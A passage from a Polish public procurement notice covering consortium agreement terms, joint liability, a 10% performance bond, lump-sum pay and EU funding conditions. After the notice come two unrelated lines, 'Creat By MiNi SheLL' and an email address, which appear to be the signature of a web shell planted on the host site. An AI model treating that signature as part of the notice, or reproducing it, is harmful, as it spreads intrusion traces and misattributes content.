2) cel zawarcia umowy,<br>
3) czas trwania konsorcjum (obejmujący okres realizacji przedmiotu zamówienia, gwarancji i rękojmi),<br>
4) zapis o solidarnej odpowiedzialności każdego członka konsorcjum wobec Zamawiającego za wykonanie umowy,<br>
5) wyłączenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu wykonania przedmiotu zamówienia.<br>
15. Przed zawarciem umowy wybrany Wykonawca zobowiązany będzie wnieść zabezpieczenia należytego wykonania umowy w wysokości 10% ceny ofertowej.<br>
16. Zamawiający w niniejszym postępowaniu wprowadza ryczałtową formę wynagrodzenia Wykonawcy. Przedmiar robót jako część składowa dokumentacji projektowej przekazany zostanie Wykonawcom jedynie w celu informacyjnym.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com